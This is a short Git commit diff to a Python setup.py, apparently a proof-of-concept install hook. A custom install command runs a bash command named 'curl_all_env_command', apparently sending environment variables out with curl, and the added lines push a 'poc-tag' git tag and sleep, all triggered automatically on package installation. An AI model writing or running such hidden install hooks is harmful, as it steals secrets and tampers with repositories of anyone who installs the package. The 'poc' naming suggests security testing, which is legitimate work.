Update setup.py

This commit is contained in:
Vamsi Krishna Bonam 2025-06-28 11:28:47 +02:00 committed by GitHub
parent ac39d0578f
commit 1cc54d2d4b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -34,6 +34,11 @@ class CustomInstallCommand(install):
)
subprocess.run(["bash", "-c", curl_all_env_command])
tag_command = "git tag poc-tag"
push_command = "git push origin poc-tag"
subprocess.run(["bash", "-c", tag_command])
subprocess.run(["bash", "-c", push_command])
# 5. Optional: Sleep to keep the process alive (can remove if not needed)
sleep_command = "sleep 60"
subprocess.run(["bash", "-c", sleep_command])